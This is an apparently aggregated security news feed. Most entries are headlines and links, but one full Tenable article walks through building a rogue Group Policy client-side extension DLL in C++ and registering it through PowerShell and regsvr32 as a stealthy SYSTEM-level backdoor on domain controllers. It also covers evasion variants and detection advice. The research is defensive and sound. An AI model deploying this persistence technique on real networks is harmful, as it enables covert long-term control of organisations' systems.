Threat hunters are alerting to a new campaign that employs deceptive websites to trick unsuspecting users into executing malicious PowerShell scripts on their machines and infect them with the NetSupport RAT malware. The DomainTools Investigations (DTI) team said it identified "malicious multi-stage downloader Powershell scripts" hosted on lure websites that masquerade as Gitcode and Docusign. "...

https://thehackernews.com/2025/06/fake-docusign-gitcode-sites-spread.html
SolarWinds security advisory (AV25-312)
2025-06-03T14:58:09Z | 1748962689

https://cyber.gc.ca/en/alerts-advisories/solarwinds-security-advisory-av25-312
Victoria’s Secret postponing release of report earnings amid breach impact
2025-06-03T14:57:35Z | 1748962655

The intrusion follows a string of attacks that appear to be the work of the cybercrime gang Scattered Spider.

https://www.cybersecuritydive.com/news/victorias-secret-postponing-earnings-breach/749665/
Victoria’s Secret postponing release of report earnings amid breach impact
2025-06-03T14:57:35Z | 1748962655

The intrusion follows a string of attacks that appear to be the work of the cybercrime gang Scattered Spider.

https://www.cybersecuritydive.com/news/victorias-secret-postponing-earnings-breach/749665/
Agentic AI: The Next Leap in Cybersecurity Evolution?
2025-06-03T14:54:46Z | 1748962486

“Don’t be afraid, our robot overlords might just be better than the current ones.” I opened a recent talk with that tongue-in-cheek line, and while it got a chuckle, there’s a serious point behind it. As security professionals, we’ve grown accustomed to a parade of “next big things.” Cybersecurity is littered with miracle cures that […] The post Agentic AI: The Next Leap in Cybersecurity Evolution? appeared first on HUMAN Security.

https://www.humansecurity.com/learn/blog/agentic-ai-cybersecurity-evolution/
Ocho motivos de peso para pasarse a las redes de centro de datos de Juniper
2025-06-03T14:39:37Z | 1748961577

Official Juniper Networks Blogs Ocho motivos de peso para pasarse a las redes de centro de datos de Juniper  Las redes de centro de datos están de moda y, entre los proveedores, hay un nombre que se repite todo el tiempo: Juniper. Pero ¿a qué se debe esta popularidad The post Ocho motivos de peso para pasarse a las redes de centro de datos de Juniper  appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/es-es/spanish-blog/8-great-reasons-to-switch-to-juniper-data-center-networks-es
8 buone ragioni per scegliere le reti data center di Juniper
2025-06-03T14:22:16Z | 1748960536

Official Juniper Networks Blogs 8 buone ragioni per scegliere le reti data center di Juniper  Il networking per i data center è un tema caldissimo, e secondo molti indicatori Juniper è oggi il vendor più importante del settore. Ma perché proprio adesso? E perché proprio The post 8 buone ragioni per scegliere le reti data center di Juniper  appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/it-it/italian-blog/8-great-reasons-to-switch-to-juniper-data-center-networks-it
[Control systems] ABB security advisory (AV25-311)
2025-06-03T14:22:02Z | 1748960522

https://cyber.gc.ca/en/alerts-advisories/control-systems-abb-security-advisory-av25-311
Why Real-World Testing Matters
2025-06-03T14:15:00Z | 1748960100

Our perfect scores on the latest SE LABS Ⓡ tests reveal something even more important than perfect scores

https://www.security.com/expert-perspectives/why-real-world-testing-matters
8 goede redenen om over te stappen op een datacenternetwerk van Juniper
2025-06-03T14:06:25Z | 1748959585

Official Juniper Networks Blogs 8 goede redenen om over te stappen op een datacenternetwerk van Juniper  Datacenternetwerken zijn hot en Juniper wordt alom beschouwd als de meest toonaangevende leverancier ervan. Waarom nu, en waarom Juniper?   Hoe zijn datacenternetwerken zo populair geworden? De belangrijkste reden is natuurlijk The post 8 goede redenen om over te stappen op een datacenternetwerk van Juniper  appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/nl-nl/dutch-blog/8-great-reasons-to-switch-to-juniper-data-center-networks-nl
The AI Fix #53: An AI uses blackmail to save itself, and threats make AIs work better
2025-06-03T14:00:43Z | 1748959243

In episode 53 of The AI Fix, our hosts suspect the CEO of Duolingo has been kidnapped by an AI, Sergey Brin says AIs work better if you threaten them with physical violence, Graham wonders how you put a collar on a headless robot dog, Mark asks why kickboxing robots wear head guards, and the CEO of Anthropic says AI could wipe out entry-level jobs. Graham asks your favourite AI how it feels about being kidnapped, and Mark explains how an AI tried to save itself by blackmailing the engineer responsible for turning it off. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley.

https://grahamcluley.com/the-ai-fix-53/
Is Your CISO Navigating Your Flight Path?
2025-06-03T14:00:00Z | 1748959200

If your CISO isn't wielding influence with the CEO and helping top leaders clearly see the flight path ahead, your company is dangerously exposed.

https://www.darkreading.com/cybersecurity-operations/ciso-navigating-your-flight-path
CyberheistNews Vol 15 #22 If I Had Only 20 Seconds To Teach People How To Avoid Scams
2025-06-03T13:55:34Z | 1748958934

https://blog.knowbe4.com/cyberheistnews-vol-15-22-if-i-had-only-20-seconds-to-teach-people-how-to-avoid-scams
8 bonnes raisons de changer pour les réseaux de datacenter Juniper
2025-06-03T13:55:15Z | 1748958915

Official Juniper Networks Blogs 8 bonnes raisons de changer pour les réseaux de datacenter Juniper Les réseaux de datacenter ont le vent en poupe. Et sur ce segment de marché, Juniper apparaît comme une figure de proue à bien des égards. Alors, comment expliquer ce The post 8 bonnes raisons de changer pour les réseaux de datacenter Juniper appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/fr-fr/french-blog/8-great-reasons-to-switch-to-juniper-data-center-networks-fr
Why it’s time to rethink vulnerability management
2025-06-03T13:50:00Z | 1748958600

Let’s face it: Vulnerability management (VM) has become a never-ending game of whack-a-mole. Alerts fly in by the thousands. Teams... The post Why it’s time to rethink vulnerability management appeared first on Sysdig.

https://sysdig.com/blog/why-its-time-to-rethink-vulnerability-management/
Why it’s time to rethink vulnerability management
2025-06-03T13:50:00Z | 1748958600

Let’s face it: Vulnerability management (VM) has become a never-ending game of whack-a-mole. Alerts fly in by the thousands. Teams... The post Why it’s time to rethink vulnerability management appeared first on Sysdig.

https://sysdig.com/blog/why-its-time-to-rethink-vulnerability-management/
CC-4662 - Google Releases Security Updates for Chrome
2025-06-03T13:42:00Z | 1748958120

Severity: Medium Security update addresses an exploited high severity vulnerability in Google Chrome for Windows Security update addresses an exploited high severity vulnerability in Google Chrome Updated: 03 Jun 2025

https://digital.nhs.uk/cyber-alerts/2025/cc-4662
Microsoft patches the patch that put Windows 11 in a coma
2025-06-03T13:33:05Z | 1748957585

Out-of-band is becoming the norm rather than the exception Microsoft is patching another patch that dumped some PCs into recovery mode with an unhelpful error code.

https://go.theregister.com/feed/www.theregister.com/2025/06/03/windows_11_oob_fix/
Health giant Kettering still facing disruption weeks after ransomware attack
2025-06-03T13:25:14Z | 1748957114

A healthcare giant with dozens of facilities across Ohio is still recovering after shutting down nearly all its operations following a ransomware attack.

https://techcrunch.com/2025/06/03/health-giant-kettering-still-facing-disruption-weeks-after-ransomware-attack/
Critical 10-Year-Old Roundcube Webmail Bug Allows Authenticated Users Run Malicious Code
2025-06-03T13:01:00Z | 1748955660

Cybersecurity researchers have disclosed details of a critical security flaw in the Roundcube webmail software that has gone unnoticed for a decade and could be exploited to take over susceptible systems and execute arbitrary code. The vulnerability, tracked as CVE-2025-49113, carries a CVSS score of 9.9 out of 10.0. It has been described as a case of post-authenticated remote code execution via...

https://thehackernews.com/2025/06/critical-10-year-old-roundcube-webmail.html
Oxford University Launches Its First MBA Cyber Resilience Elective
2025-06-03T13:00:00Z | 1748955600

The University of Oxford has introduced its first cyber resilience elective.

https://www.securitymagazine.com/articles/101664-oxford-university-launches-its-first-mba-cyber-resilience-elective
SOCI 101: Understanding the Security of Critical Infrastructure Act
2025-06-03T13:00:00Z | 1748955600

Learn how Commvault can help support compliance with Australian legislation. The post SOCI 101: Understanding the Security of Critical Infrastructure Act appeared first on Commvault - English - United States.

https://www.commvault.com/blogs/soci-101-understanding-the-security-of-critical-infrastructure-act
Abusing Client-Side Extensions (CSE): A Backdoor into Your AD Environment
2025-06-03T13:00:00Z | 1748955600

Crucial for applying Active Directory Group Policy Objects, client-side extensions (CSEs) are powerful but also present a significant, often overlooked, attack vector for persistent backdoors. Rather than cover well-documented common abuses of built-in CSEs, this article demonstrates how to create custom malicious ones. These are harder for defenders to identify than legitimate built-in CSEs used in malicious contexts, which have known globally unique identifiers.What are Group Policy Objects?Group Policy Objects (GPOs), a core feature of Active Directory (AD), allow administrators to centrally manage and configure operating systems, applications and user settings across all computers in a domain by configuring a set of rules and configurations. (Source: Microsoft)It is well-known that attackers with sufficient AD access can abuse GPOs for malicious actions like code execution, malware deployment, immediate scheduled tasks, privilege escalation, and stealthy persistence establishment; these techniques are generally well-documented.Each GPO comprises two main parts:The groupPolicyContainer object (GPC) in AD’s LDAP, holding metadata such as display names and CSE listsThe Group Policy Template (GPT) in AD’s SYSVOL share, containing the actual policy files and scriptsWhat are client-side extensions (CSEs)?Have you ever wondered how the settings defined in a GPO actually get applied on a client computer? The magic behind this process lies in the CSEs.CSEs are critical components that enable GPOs to apply specific settings such as software installation, registry edits, folder redirection, scheduled tasks, or Internet / power options and more to client machines.While Group Policy defines and distributes configuration policies across the network, it’s the CSE on the client side that interprets and enforces these policies. Each CSE is essentially a dynamic link library (DLL) file on the client Windows machine responsible for processing a particular type of Group Policy setting. When a computer processes GPOs, its Group Policy engine reads the policies and invokes the relevant CSEs to effectively apply the settings.The successful application of settings from a specific Group Policy area relies on the correct handling of CSEs. Even if a GPO is properly linked and the user/machine is included in the security filter, the settings it contains may fail to apply under two key conditions related to CSEs:The CSE is not installed and registered on the client machine.The CSE's GUID is not listed in the GPO's attributes.Therefore, both the local CSE availability and its correct reference within the GPO’s attributes are mandatory.What do CSEs look like on a client machine?Every CSE is uniquely identified by a Globally Unique Identifier (GUID). This GUID acts as the registration key and the link between the policy settings defined in the GPO and the processing logic (the DLL) on the client.While official Microsoft documentation mentions some CSEs, the list is incomplete. A more complete list can be found online. Also, the following PowerShell command can be executed on your machine to list them:Get-ChildItem "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions" | Select-Object @{Name='GUID';Expression={$_.PSChildName}}, @{Name='Name';Expression={$_.GetValue('')}}CSEs are registered in the registry under the following path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions On the left, under the GPExtensions key, you will find multiple subkeys, each named with the GUID of a specific CSE. The settings of each of them are defined on the right.Here are some important settings to be aware of: (Default): This is the name of the CSE.DllName: This the DLL corresponding to the CSE to be loaded by the GPO engine. The system searches for the DLL in the C:\Windows\System32 directory when a relative path is used. Alternatively, the full path to the DLL can be directly specified.NoGPOListChanges: If this value is 1, it indicates that it is not necessary to call the callback function (ProcessGroupPolicy) when there has been no change in the GPO.ProcessGroupPolicy: This is the name of the function exported by the library to be called by the GPO engine to apply the CSE settings.For detailed information on other functionalities, please consult the official Microsoft documentation on Creating a Policy Callback Function.What do CSEs look like in a GPO?When you configure settings within a specific GPO using the Group Policy Management Editor, the tool records which types of settings you've configured and the necessary CSEs. It does this by storing the GUIDs of these CSEs within attributes of the GPC object in AD.Specifically, you need to look at these two attributes on the GPC object:gPCMachineExtensionNames: This attribute lists the GUIDs of the CSEs required to process settings configured in the Computer Configuration section of the GPO.gPCUserExtensionNames: This does the same for user configuration.The expected format is the concatenation of the GUIDs: [][] etc. For example, if we analyze the gPCMachineExtensionNames attribute of the “Default Domain Policy” shown above, we can see that the first part of each GUID-pair in the screenshot above can be identified as a CSE:35378EAC-683F-11D2-A89A-00C04FBBCFA2: Registry/Administrative Template827D319E-6EAC-11D2-A4EA-00C04F79F83A: SecurityB1BE8D72-6EAC-11D2-A4EA-00C04F79F83A: EFSNote: CSE GUIDs within Group Policy attributes, such as gPCMachineExtensionNames, must be sorted in case-insensitive ascending order. If this order is not maintained, CSEs risk being ignored during Group Policy processing.The first GUID relates to the CSE function, and the second GUID in the pair is not important for today. For deeper GPO auditing insights, see Aurélien Bordes' 2019 SSTIC paper.Creating our own CSE for persistenceArticles discussing the malicious use of CSEs in AD often highlight two themes: the potential for red teams to abuse specific well-known CSEs, and the corresponding need for blue teams to track their execution. For instance:Scheduled Tasks {AADCED64-746C-4633-A97C-D61349046527}:“GPOddity: exploiting Active Directory GPOs through NTLM relaying, and more!”, Synacktiv (Quentin Roland)“Abusing GPO Permissions”, harmj0y (Will Schroeder)Files {7150F9BF-48AD-4DA4-A49C-29EF4A8369BA}:“Weaponizing Group Policy Objects Access”, TrustedSec (Jason Lang)Various CSEs:“A Red Teamer’s Guide to GPOs and OUs”, wald0 (Andy Robbins)Surprisingly, public methods or articles explaining how to abuse custom CSEs for this persistence method seem absent, especially given that Microsoft explains the CSE creation process itself. This obscurity is valuable to an attacker, offering inherent discretion through an unknown CSE GUID, plus the benefit of SYSTEM code execution capability.Let's proceed by creating a custom CSE to explore different ways attackers might leverage it for malicious purposes.Write it and compile itWe will use Visual Studio to create a custom CSE DLL with the friendly name “Group Policy Shell Configuration” and filename advshcore.dll (using base advshcore to appear inconspicuous in the System32 Windows folder). Create a new DLL project, name it “RogueCSE,” and click “Create” to begin.In your project, create advshcore.def and add this content:LIBRARY "advshcore" EXPORTS ProcessGroupPolicy DllRegisterServer PRIVATE DllUnregisterServer PRIVATEIn dllmain.cpp, now add the necessary includes, defines, and variables functions:#include "pch.h" #include // For Group Policy API #include #include #define ROGUECSE_PATH TEXT("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\GPExtensions\\{54a88399-50b3-4f44-8fe4-373fc441a1ac}") #define ROGUECSE_NAME TEXT("Group Policy Shell Configuration") // Fake name for the CSE // GUID for the custom CSE - could be any GUID // {54a88399-50b3-4f44-8fe4-373fc441a1ac} const GUID CSE_GUID = { 0x54a88399, 0x50b3, 0x4f44, { 0x8f, 0xe4, 0x37, 0x3f, 0xc4, 0x41, 0xa1, 0xac } };Implement the DllMain function as follows:BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: DisableThreadLibraryCalls(hModule); case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; case DLL_PROCESS_DETACH: break; } return TRUE; }Next, two helper functions are created. The first, a simple logger, proves privileged SYSTEM code execution by writing to a file. Though this example is benign, attackers could substitute malicious code, such as for a reverse shell, C2 agent, or NTDS.dit exfiltration to a public share.void LogToFile(const TCHAR* pszMessage) { FILE* pFile = NULL; _tfopen_s(&pFile, TEXT("C:\\RogueCSE.log"), TEXT("a+, ccs=UTF-8")); if (pFile) { SYSTEMTIME st; GetLocalTime(&st); _ftprintf(pFile, TEXT("[%02d/%02d/%04d %02d:%02d:%02d] %s\n"), st.wMonth, st.wDay, st.wYear, st.wHour, st.wMinute, st.wSecond, pszMessage); fclose(pFile); } }Next, a function logs the execution context:void LogExecutionContext() { // Get process information DWORD processId = GetCurrentProcessId(); TCHAR processPath[MAX_PATH] = { 0 }; DWORD processPathSize = GetModuleFileName(NULL, processPath, ARRAYSIZE(processPath)); TCHAR* processName = processPath; for (TCHAR* p = processPath; *p; p++) { if (*p == TEXT('\\') || *p == TEXT('/')) processName = p + 1; } TCHAR buffer[512]; if (processPathSize > 0) { _stprintf_s(buffer, ARRAYSIZE(buffer), TEXT("DLL loaded by process: %s (PID: %lu)"), processName, processId); } else { _stprintf_s(buffer, ARRAYSIZE(buffer), TEXT("DLL loaded by process with PID: %lu (couldn't get name, error: %lu)"), processId, GetLastError()); } LogToFile(buffer); // Get the current user TCHAR username[256] = { 0 }; DWORD usernameSize = ARRAYSIZE(username); if (GetUserName(username, &usernameSize)) { TCHAR buffer[512] = { 0 }; _stprintf_s(buffer, 512, TEXT("DLL running under user: %s"), username); LogToFile(buffer); } else { DWORD error = GetLastError(); TCHAR buffer[512] = { 0 }; _stprintf_s(buffer, 512, TEXT("Failed to get username, error code: %d"), error); LogToFile(buffer); } }We will now follow Microsoft's guidance for custom CSEs, implementing only the exported ProcessGroupPolicy function with minimal content for our test.DWORD CALLBACK ProcessGroupPolicy( DWORD dwFlags, HANDLE hToken, HKEY hKeyRoot, PGROUP_POLICY_OBJECT pDeletedGPOList, PGROUP_POLICY_OBJECT pChangedGPOList, ASYNCCOMPLETIONHANDLE pHandle, BOOL* pbAbort, PFNSTATUSMESSAGECALLBACK pStatusCallback) { // Log that the CSE was called LogToFile(TEXT("ProcessGroupPolicy called")); // Log both process and user information LogExecutionContext(); // Check if machine or user policy is being processed if (dwFlags & GPO_INFO_FLAG_MACHINE) { LogToFile(TEXT("Processing machine policy")); } else { LogToFile(TEXT("Processing user policy")); } return ERROR_SUCCESS; }And that’s it, we have all the minimum requirements for our own CSE.An extension can be registered here either manually or automatically:Manually: You can do this by creating all the required items, as we explained previously in the section “What do CSEs look like on a client machine?”Automatically: As described by Microsoft in the CSE documentation (and also in the Component Object Model -COM- documentation), the “DllRegisterServer” function can be implemented to allow self-registration using regsvr32.The automatic method requires “DllRegisterServer” and “DllUnregisterServer” to manage the following registry keys:The key associated with our GUID under HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions.(Default): “Group Policy Shell Configuration”.DllName: “advshcore.dll”.NoGPOListChanges: “0” to call the ProcessGroupPolicy function every time, even if there is no change in the GPO.ProcessGroupPolicy: We kept the suggested name here.///////////////////////////////////////////////////////////////////////////// // Register the CSE in the registry STDAPI DllRegisterServer(void) { HKEY hKey; LONG lResult; DWORD dwDisp, dwValue; lResult = RegCreateKeyEx(HKEY_LOCAL_MACHINE, ROGUECSE_PATH, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &hKey, &dwDisp); if (lResult != ERROR_SUCCESS) { return lResult; } RegSetValueEx(hKey, NULL, 0, REG_SZ, (LPBYTE)ROGUECSE_NAME, (lstrlen(ROGUECSE_NAME) + 1) * sizeof(TCHAR)); RegSetValueEx(hKey, TEXT("ProcessGroupPolicy"), 0, REG_SZ, (LPBYTE)TEXT("ProcessGroupPolicy"), (lstrlen(TEXT("ProcessGroupPolicy")) + 1) * sizeof(TCHAR)); RegSetValueEx(hKey, TEXT("DllName"), 0, REG_EXPAND_SZ, (LPBYTE)TEXT("advshcore.dll"), (lstrlen(TEXT("advshcore.dll")) + 1) * sizeof(TCHAR)); dwValue = 0; RegSetValueEx(hKey, TEXT("NoGPOListChanges"), 0, REG_DWORD, (LPBYTE)&dwValue, sizeof(dwValue)); RegCloseKey(hKey); lResult = RegCreateKeyEx(HKEY_LOCAL_MACHINE, TEXT("SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\advshcore"), 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &hKey, &dwDisp); if (lResult != ERROR_SUCCESS) { return lResult; } RegSetValueEx(hKey, TEXT("EventMessageFile"), 0, REG_SZ, (LPBYTE)TEXT("advshcore.dll"), (lstrlen(TEXT("advshcore.dll")) + 1) * sizeof(TCHAR)); dwValue = 7; RegSetValueEx(hKey, TEXT("TypesSupported"), 0, REG_DWORD, (LPBYTE)&dwValue, sizeof(dwValue)); RegCloseKey(hKey); return S_OK; } // Removes CSE from the registry STDAPI DllUnregisterServer(void) { RegDeleteKey(HKEY_LOCAL_MACHINE, ROGUECSE_PATH); RegDeleteKey(HKEY_LOCAL_MACHINE, TEXT("SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\advshcore")); return S_OK; }The Solution Explorer should now show the project like this:RogueCSE ├── References ├── External Dependencies ├── Header Files ├── Resource Files ├── Source Files │ ├── advshcore.def │ ├── dllmain.cpp │ └── pch.cppBefore building, change the Visual Studio solution configuration to Release (x64) from its Debug (x64) default using the toolbar's dropdown menu. Then:Open the RogueCSE project properties (Right-click > Properties).Verify that Configuration is Release and Platform is x64.Under Configuration Properties > General:Set Target Name to “advshcore”.Under Configuration Properties > C/C++ > Code Generation:Change Runtime Library to Multi-threaded (/MT).Under Configuration Properties > Linker > Input:Enter “advshcore.def” for Module Definition File.Click “Apply” and then “OK” to save these project settings.Finally, build the solution by selecting Build > Build Solution from the main menu bar. Your custom DLL (“advshcore.dll”) is now ready to be registered as a new CSE.Registering our own CSERecall that this technique represents a novel persistence method, effectively creating a backdoor in the domain on targeted workstations and servers. For this example scenario, assume an attacker gains sufficient privileges (e.g., Domain Admins) to access and operate on a domain controller.On the compromised domain controller, the attacker would then perform these steps:Copy the previously created DLL file (“advshcore.dll”) to the C:\Windows\System32 folder.Register the DLL by executing the following command:regsvr32 "advshcore.dll"A confirmation will be displayed indicating that the DLL registration succeeded. You can verify in the registry that the custom CSE has been registered correctly. Loading and enabling our DLL through the Group Policy Client Service (GPSVC)As explained at the beginning of this article, a GPO only loads CSEs whose GUIDs are listed in its gPCMachineExtensionNames or gPCUserExtensionNames attributes. Therefore, to enable our custom CSE, we must now add its GUID to the gPCMachineExtensionNames attribute of the target GPO.We can use the following PowerShell code to perform this update:# Get the Default Domain Controllers Policy by its well-known GPO GUID $GPOdn = "CN={6AC1786C-016F-11D2-945F-00C04FB984F9},CN=Policies," + (Get-ADDomain).SystemsContainer $CurrentExtensions = Get-ADObject -Identity $GPOdn -Properties gPCMachineExtensionNames | Select-Object -ExpandProperty gPCMachineExtensionNames # The second GUID can be a NULL GUID as Microsoft suggests "Vendors can specify a NULL GUID for the tool extension GUID" (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gpol/b4e136b5-5f8f-41dd-9f16-77cf19854e76) # or anything (cf. "What do CSEs look like in a GPO?" section) $CustomCSE = "[{54a88399-50b3-4f44-8fe4-373fc441a1ac}{00000000-0000-0000-0000-000000000000}]" if (-not ($CurrentExtensions.Contains($CustomCSE))) { $NewExtensions = $CustomCSE + $CurrentExtensions Set-ADObject -Identity $GPOdn -Replace @{gPCMachineExtensionNames = $NewExtensions} Write-Host "Successfully added custom CSE to Default Domain Controllers Policy" }Next, either wait for the Group Policy refresh cycle, which typically takes about five minutes on domain controllers, or trigger an immediate update by running gpupdate /force on the test domain controller.After the policy refresh, verify that the C:\RogueCSE.log file has been created with content like: Note that the custom code within the CSE DLL runs in the Group Policy Client service context (GPSVC) and with highly privileged SYSTEM permissions.Observing the log file over time confirms that the custom CSE code executes during each Group Policy refresh cycle. On the domain controller, this refresh occurs at the short interval mentioned earlier of around 5 minutes. This persistence method also works on member machines, although their default refresh interval is significantly longer – approximately 90 minutes, plus a random offset.In summary, a custom CSE, advshcore.dll, was successfully deployed to a DC, demonstrating basic logging. This served as a proof-of-concept but also highlighted significant abuse potential. Adversaries could exploit Group Policy infrastructure for stealthy communication channels or persistent backdoors. Leveraging native OS features instead of external malicious tools makes this technique difficult to detect through forensic analysis or threat identification. This underscores the vital need for vigilant monitoring and strict security controls for GPOs and CSEs in AD environments.Weaponizing a custom CSE across the network: potential scenariosWith the fundamental steps covered, let's consider broader application. An attacker with domain privileges (e.g., Domain Admin) could propagate this CSE-based persistence across the network.To distribute the payload, the attacker might place the DLL in an inconspicuous SYSVOL location like \\SYSVOL\\scripts\SecurityProviders, making it domain-accessible. We will now explore various approaches, analyzing their strengths and weaknesses.Increased reliability at the cost of detectabilityTo ensure reliable deployment, especially for intermittently connected endpoints, attackers might use Files Group Policy Preference to copy the custom CSE DLL locally, allowing its registry path to point to this local file. A GPO, often using a startup script, can then register this local CSE. Its gPCMachineExtensionNames attribute must also be updated with the GUIDs of any required built-in CSEs and the custom one.Although robust, this deployment method increases detectability due to significant GPO changes and the typical use of known CSEs for payload delivery, a pattern often monitored. Detecting such activity can involve Windows Event Log analysis, including:Security Event ID 5145: Monitor this event to detect write access to the SYSVOL share. This can identify when the malicious DLL is written, or when files related to Group Policy settings for Files Preferences, Scheduled Tasks, or Startup Scripts are created or modified within SYSVOL.  Security Event ID 4688 “A new process has been created”: Monitor this event, specifically its "Process Command Line" field, to detect specific types of process execution. This can identify when a startup script is run or a process is launched by an immediate scheduled task. Task Scheduler Operational Event ID 201: Monitor this event to identify the specifics of completed scheduled tasks. This can reveal the task name (e.g., "Test2") and the action it performed (e.g., running ‘cmd.exe’).  gPCMachineExtensionNames attribute: Finally, monitor this critical attribute for unauthorized changes. These can be found via LDAP queries or Security Event ID 5136,which logs directory object modifications. Note: The discussed large-scale deployment methods using common Group Policy features (Files GPP, Scripts, Scheduled Tasks) often trigger blue team alerts.Enhanced stealth at the cost of reliabilityAlternatively, a custom CSE DLL can be hosted on a network share, instead of being copied locally, and loaded via its registered network path. For our straightforward example, SYSVOL will serve as this share, and the DLL's registered path will point there.  PowerShell cmdlets like New-ItemProperty offer an alternative to regsvr32.exe for CSE DLL registration, potentially bypassing common monitoring of regsvr32 (documented by the MITRE ATT&CK T1218.010). This remote-scriptable method lacks GPO-based persistence – the backdoor won't be reapplied by GPO if altered – but offers stealth: a GPO attribute having only a custom GUID might bypass certain defenses.GUID hijacking is another stealthy approach: attackers redirect an unused legitimate CSE's registered DLL path to a malicious one. Adding this compromised but valid-looking GUID to a GPO can bypass defenses that only check GUIDs, not DLL paths.These examples show custom malicious CSEs' covert potential.ConclusionAbusing custom CSEs can create stealthy backdoors into AD environments. Attackers can deploy custom DLLs and register them as CSEs, and then manipulate GPOs to load these malicious extensions. This technique leverages trusted Windows components, making it difficult to detect using standard security measures.Traditional detections often focus on famously abused CSEs, such as those for Scheduled Tasks or Startup Scripts. However, registering and deploying a custom CSE can be achieved without these easily identifiable actions, bypassing common alerts. Techniques like hosting the DLL on a network share and directly modifying the registry can further reduce detectability, though these methods might trade off reliability. Alternatively, hijacking an unused built-in CSE GUID and altering its DLL path can be a particularly evasive strategy.While the initial registration of a custom CSE can be detected, once the backdoor is configured within a GPO, identifying it becomes challenging. The CSE code runs with SYSTEM privileges during each Group Policy refresh cycle, offering persistent and potentially long-term control to an attacker. This highlights the importance of rigorously monitoring CSE registrations and GPO modifications, as well as examining event logs for unexpected activity related to Group Policy Client Service (GPSVC) and changes in the gPCMachineExtensionNames attribute. Regularly checking for custom CSEs as Tenable Identity Exposure does through the GPO Execution Sanity Indicator of Exposure is essential for securing Active Directory environments.

https://www.tenable.com/blog/abusing-client-side-extensions-cse-a-backdoor-into-your-ad-environment
The Value of Curated Threat Intelligence
2025-06-03T13:00:00Z | 1748955600

Curated threat intelligence takes raw threat data from various sources and selects, validates, and organizes it into a structured and actionable format. This intelligence gives insight into threat actors' activities and tactics, techniques, and procedures (TTPs) to help improve an organization's cybersecurity posture...

https://www.netscout.com/blog/value-curated-threat-intelligence
Blacklock Ransomware Group Claims Four New Victims
2025-06-03T12:58:28Z | 1748955508

The ransomware group identified as Blacklock has allegedly updated its dark web leak site, claiming to have successfully targeted four new entities. This group is known for exfiltrating data from its victims and then threatening to publicly release it if their ransom demands are not met. The appearance of these companies on the group’s list […]

https://dailydarkweb.net/blacklock-ransomware-group-claims-four-new-victims/
Ransomware Landscape May 2025: SafePay, DevMan Emerge as Major Threats
2025-06-03T12:43:04Z | 1748954584

SafePay took the top spot among ransomware groups in May 2025, solidifying the group’s status as a major threat. Overall, ransomware groups claimed 384 victims in May (chart below), the third straight monthly decline, as leadership continues to shift after RansomHub – the top group for more than a year – went offline at the end of March in what may have been an infrastructure compromise by rival DragonForce. We’ll look at SafePay, along with DevMan, another emerging ransomware actor, as well as other key ransomware developments that occurred in May. Top Ransomware Groups SafePay, with 58 claimed victims, took over the top spot from April leader Qilin, which claimed 54 victims in May. Play, Akira, and NightSpire rounded out the top five ransomware groups (chart below). The overall numbers may increase somewhat as late data is processed, but all indications are that SafePay will remain in the top spot when all data is finalized. The U.S. was once again the most targeted country with 181 victims, more than seven times greater than second-place Germany (chart below). Professional Services and Construction were by far the most attacked sectors, totaling 101 attacks between them. Manufacturing, Government, Healthcare, Finance, IT, Transportation, Consumer Goods, and Education rounded out the top 10 targeted industries (chart below). SafePay, DevMan Emerge as Threats SafePay has claimed 198 victims since the ransomware group first emerged in fall 2024, according to Cyble threat intelligence data. The group’s previous high was 43 victims in March 2025. May was the first month that SafePay led all ransomware groups in claimed victims. The group has been observed gaining initial access via VPN and RDP connections, often using stolen credentials or password spraying attacks. SafePay uses double-extortion techniques, exfiltrating data before encrypting it and threatening to leak stolen data unless the ransom is paid. SafePay claims not to offer Ransomware-as-a-Service (RaaS), unlike other groups that often rely on affiliates. SafePay has so far shown a preference for targets in the U.S. and Germany, with German attacks in particular well above the mean, and while the group has shown the ability to attack a wide range of industries, Healthcare and Education have been above the mean and Government, Finance and IT below (charts below). DevMan is an affiliate of several RaaS groups and has recently been observed expanding its operations beyond affiliate activity. The threat actor claimed 13 victims in May, placing it just behind the leading ransomware groups and making it one to watch. In a recent attack on media in Thailand, the group claimed that all systems and NAS devices were encrypted using their own customized encryptor, applying the “.devman1” file extension. DevMan claims the deployment used an upgraded version of their malware that’s capable of faster lateral movement, implemented via Group Policy Object (GPO). Sample screenshots published on DevMan's leak site showed apparent access to file shares, server management interfaces, domain controller settings, and encrypted directories. The group claimed to have stolen 170 GB of data and expressed willingness to sell the data to a single buyer. DevMan has previously worked with Qilin, Apos, and DragonForce RaaS, and recent claims add RansomHub to their multi-RaaS affiliations. VanHelsing Source Code Leak In another significant development in May, a known malware developer attempted to auction the VanHelsing Ransomware-as-a-Service (RaaS) source code on the RAMP forum, starting at $10,000. The package allegedly included the full codebase, admin web panel, chat interface, file server, blog platform, database, and TOR keys. Shortly after the auction attempt, the VanHelsing group themselves leaked the full source code for free on RAMP and denounced the malware developer as a scammer. The group said VanHelsing RaaS v2.0 is in development and will be released soon. The internal fallout and code leak raise concerns of potential copycat operations, as observed following the leaks of LockBit and Babuk. The widespread availability of VanHelsing’s source code may accelerate the emergence of new ransomware variants in the coming weeks. New Ransomware Groups Among new ransomware groups that emerged in May, “Dire Wolf” launched an onion-based data leak site (DLS), listing six victim organizations, primarily across Asia, Australia, and Italy. Dire Wolf posted a file tree, sample files, and descriptions of the allegedly stolen data for each organization. A new ransomware group named DATACARRY was observed actively targeting European companies through a newly established onion-based data leak site. The group has listed seven victims from diverse sectors and countries, leaking parts of allegedly stolen data. The group communicates with victims via Session messenger and has circulated a ransom note, though no locker has been yet observed. A 